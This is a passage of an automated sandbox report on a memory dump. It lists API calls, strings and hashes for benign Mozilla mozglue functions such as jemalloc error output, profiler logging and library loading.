<jemalloc>, xrefs: 6CCCCF9F, 6CCCCFB3

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 13ed7ad1c1d7ed67cfcf4cb2dce75144c04764a889a2ac2f622c64d3055698d1
Instruction ID: e5cd10dde93461f11bcaedab1f648c1bb4b39c1cede97604f2247076441ef11e
Opcode Fuzzy Hash: 13ed7ad1c1d7ed67cfcf4cb2dce75144c04764a889a2ac2f622c64d3055698d1
Instruction Fuzzy Hash: F731A5707452056BFB10AFA98C46B6E7BB9BB45758F204019F611ABFC0FB70D401CBA2

Function 6CC9ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC9F100: LoadLibraryW.KERNEL32(shell32,?,6CD0D020), ref: 6CC9F122
Part of subcall function 6CC9F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC9F132

moz_xmalloc.MOZGLUE(00000012), ref: 6CC9ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CC9EDCC
CreateFileW.KERNEL32 ref: 6CC9EE08
free.MOZGLUE(00000000), ref: 6CC9EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CC9EE32

Part of subcall function 6CC9EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CC9EBB5
Part of subcall function 6CC9EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CCCD7F3), ref: 6CC9EBC3
Part of subcall function 6CC9EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CCCD7F3), ref: 6CC9EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6CC9EDC1

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 517f52036b8995099fd29cf68dbc2093c914829d08eff4cfb82d83c71c328f8e
Instruction ID: 8ee26a0e9ae357f106887a595c8271ea5e562504b58d17875d14336b0594ffab
Opcode Fuzzy Hash: 517f52036b8995099fd29cf68dbc2093c914829d08eff4cfb82d83c71c328f8e
Instruction Fuzzy Hash: 4C51C071E052049BEB00DF68C8447EEB7B0BF69318F44842DE8556BB90F731A989C7E2

Function 6CD0A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CD0A565

Part of subcall function 6CD0A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CD0A4BE
Part of subcall function 6CD0A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CD0A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CD0A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CD0A6B6

Strings

0, xrefs: 6CD0A5FB
z, xrefs: 6CD0A6AE

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 9e7df8defa413f04767312cc3df0cea3fe702a414102f8479c8a8dfbebfb3255
Instruction ID: c07ce6f6cce1d3c6a39487b161882d56891d7b7862cd19c99f83a146f97d2a47
Opcode Fuzzy Hash: 9e7df8defa413f04767312cc3df0cea3fe702a414102f8479c8a8dfbebfb3255
Instruction Fuzzy Hash: 2041E771A097459FC341DF28C480A9FBBF5BF89354F908A2EE49987650EB30D549CB92

Function 6CCD9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6CCCAB89: EnterCriticalSection.KERNEL32(6CD1E370,?,?,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB94
Part of subcall function 6CCCAB89: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
__Init_thread_footer.LIBCMT ref: 6CCD949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CCD946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6CCD947D
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CCD9459

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 724963eddf0c56bfaa3d8352bb076c3be882a3715242f1be7f64f4794848707f
Instruction ID: 3ce709e600e1f80dbf6ef5604d6d420f1b5bc4f43ae0c13c0d081e27179864d6
Opcode Fuzzy Hash: 724963eddf0c56bfaa3d8352bb076c3be882a3715242f1be7f64f4794848707f
Instruction Fuzzy Hash: D701F534A041008BF700DB9EF826A453278AB4632EF05053AEB0686F52FA31E55AC95B

Function 6CD0B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CD0B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CD0B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CD0B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CD0B5F4
__Init_thread_footer.LIBCMT ref: 6CD0B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CD0B61F
std::_Facet_Register.LIBCPMT ref: 6CD0B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CD0B655

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 12e7752d42a752580dd8a8668af0aa670802322be4073cf08df7ac144eb07d8c
Instruction ID: 63fa8cc9ed755cb856ca9614e8e1f6f10a6163533e45e155b2ff0090a54b8829
Opcode Fuzzy Hash: 12e7752d42a752580dd8a8668af0aa670802322be4073cf08df7ac144eb07d8c
Instruction Fuzzy Hash: B031B5B1B04104DBEB04DFA9C85A9AEB7B9FF8A324F140555DA0697F90DB30A807CF91

Function 6CCE1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCE1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6CCE1BE3,?,?,6CCE1D96,00000000), ref: 6CCE1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6CCE1BE3,?,?,6CCE1D96,00000000), ref: 6CCE1D4C
GetCurrentThreadId.KERNEL32 ref: 6CCE1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6CCE1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCE1DDA

Part of subcall function 6CCE1EF0: GetCurrentThreadId.KERNEL32 ref: 6CCE1F03
Part of subcall function 6CCE1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CCE1DF2,00000000,00000000), ref: 6CCE1F0C
Part of subcall function 6CCE1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CCE1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CCE1DF4

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 6ba1e70f6a6f50e39bb69e32fb3ac0fffc72431ff9349bd24e4bc8feef7ee344
Instruction ID: 5097240f4d284cb825d2c9109720c93c2d42c500da787f53f1b5c86727f12bb4
Opcode Fuzzy Hash: 6ba1e70f6a6f50e39bb69e32fb3ac0fffc72431ff9349bd24e4bc8feef7ee344
Instruction Fuzzy Hash: 0B4189B5200700AFDB14DF29C489A56BBF9FB89314F10446EEA5A87B42DB71F814CB91

Function 6CCD84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD85AC

Part of subcall function 6CCD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CCD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD767F
Part of subcall function 6CCD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CCD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD7693
Part of subcall function 6CCD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CCD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CCD85B2

Part of subcall function 6CCB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CCB5EDB
Part of subcall function 6CCB5E90: memset.VCRUNTIME140(6CCF7765,000000E5,55CCCCCC), ref: 6CCB5F27
Part of subcall function 6CCB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CCB5FB2

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 396041d2acb2ed29c46ef15ee623ab35adb6c9f1bc8f7b48f3fb8274796ebebc
Instruction ID: b06e50029424387ed73ed2bfc66c75da681df7a521ccb6103c38636a785d5aa8
Opcode Fuzzy Hash: 396041d2acb2ed29c46ef15ee623ab35adb6c9f1bc8f7b48f3fb8274796ebebc
Instruction Fuzzy Hash: 49217F742006019FEB14DB29C888E5AB7B9AF8530DF15482DE65B83B41FB35F949CB91

Function 6CCA1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6CCA1699
VerSetConditionMask.NTDLL ref: 6CCA16CB
VerSetConditionMask.NTDLL ref: 6CCA16D7
VerSetConditionMask.NTDLL ref: 6CCA16DE
VerSetConditionMask.NTDLL ref: 6CCA16E5
VerSetConditionMask.NTDLL ref: 6CCA16EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CCA16F9

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: c95089f18614ace938b547bc0533ba947ad1f321fc6ce28e010303aacd27282a
Instruction ID: 76995c37d13ffab97bb905dd94fe075b9a21888c700147486ef83fa5e8e2469b
Opcode Fuzzy Hash: c95089f18614ace938b547bc0533ba947ad1f321fc6ce28e010303aacd27282a
Instruction Fuzzy Hash: 8E21C0F0740208ABFB106BA88C8AFBBB37CEB86704F044528F6059BAD0D6749D5586A1

Function 6CCDF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CCDF598), ref: 6CCDF621

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

GetCurrentThreadId.KERNEL32 ref: 6CCDF637
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8,?,?,00000000,?,6CCDF598), ref: 6CCDF645
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8,?,?,00000000,?,6CCDF598), ref: 6CCDF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CCDF62A

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: bad5bb7f5292ac8610498a77722d1b46e4d6312f4faac0baf7e32775f96f3565
Instruction ID: 272bc599045c1481fe5b9b66c98f6b54db0313d15617ee60048d3ac6104c83b6
Opcode Fuzzy Hash: bad5bb7f5292ac8610498a77722d1b46e4d6312f4faac0baf7e32775f96f3565
Instruction Fuzzy Hash: 0311A775205205BFEA04AF59D8459957BBDFB86359B110019FB0583F41EB71F826CBA0

Function 6CCA0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCCAB89: EnterCriticalSection.KERNEL32(6CD1E370,?,?,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB94
Part of subcall function 6CCCAB89: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CCCD9F0,00000000), ref: 6CCA0F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CCA0F3C
__Init_thread_footer.LIBCMT ref: 6CCA0F50
FreeLibrary.KERNEL32(?,6CCCD9F0,00000000), ref: 6CCA0F86

Strings

combase.dll, xrefs: 6CCA0F18
CoInitializeEx, xrefs: 6CCA0F36

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 5a49c721d8e42604f582d2d25028ab568595a83f0dba1ec165f972ea0f02852c
Instruction ID: 09104393ebcf89f1faf0c839e1b8e29eadbcdb8bfaa13b5a04a61c775d551685
Opcode Fuzzy Hash: 5a49c721d8e42604f582d2d25028ab568595a83f0dba1ec165f972ea0f02852c
Instruction Fuzzy Hash: 16112E75705241DBFF00DF99DD1EA4A7B7DBB8A366F004229EA06A2F80E734A407CA55

Function 6CCDF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CCA4A68), ref: 6CCD945E
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCD9470
Part of subcall function 6CCD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCD9482
Part of subcall function 6CCD9420: __Init_thread_footer.LIBCMT ref: 6CCD949F

GetCurrentThreadId.KERNEL32 ref: 6CCDF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCDF561

Part of subcall function 6CCD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CCD94EE
Part of subcall function 6CCD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CCD9508

GetCurrentThreadId.KERNEL32 ref: 6CCDF577
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDF585
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDF5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6CCDF3A8
[I %d/%d] profiler_resume, xrefs: 6CCDF239
[I %d/%d] profiler_resume_sampling, xrefs: 6CCDF499
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CCDF56A

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 0595c22010574d6ae148ef5f43f29d3d12e0e10181eb377e54cc3e20032276e1
Instruction ID: 13a6dc44e63e44adcca0b204cea029d3a3151f37ede00b1c2dd3d5e47d948b37
Opcode Fuzzy Hash: 0595c22010574d6ae148ef5f43f29d3d12e0e10181eb377e54cc3e20032276e1
Instruction Fuzzy Hash: DFF054B5600204AFFA00AB65984AA6A7BBDFB8629DF010015FB0583F42EB759806C765

Function 6CCA0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6CCA0DF8), ref: 6CCA0E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CCA0EA1
__Init_thread_footer.LIBCMT ref: 6CCA0EB5
FreeLibrary.KERNEL32 ref: 6CCA0EC5

Strings

GetProcessMitigationPolicy, xrefs: 6CCA0E9B
kernel32.dll, xrefs: 6CCA0E7D

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: f9291f6afcc3c869b9508099dea82d3d11cc105207bc66612be97a1c6b5ad8b9
Instruction ID: 307e991e26aa0f599400b566923d599c341d9957e3dde5c68a3193aa54092c1b
Opcode Fuzzy Hash: f9291f6afcc3c869b9508099dea82d3d11cc105207bc66612be97a1c6b5ad8b9
Instruction Fuzzy Hash: 68014B747042829BFF00AFE9D95AA4233BAF747359F104525DA0682FA0E730A80BDA02

Function 6CCD05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CCCCFAE,?,?,?,6CC931A7), ref: 6CCD05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CCCCFAE,?,?,?,6CC931A7), ref: 6CCD0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CC931A7), ref: 6CCD061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CC931A7), ref: 6CCD0627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6CCD061B, 6CCD0625
<jemalloc>, xrefs: 6CCD05FA, 6CCD060F

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
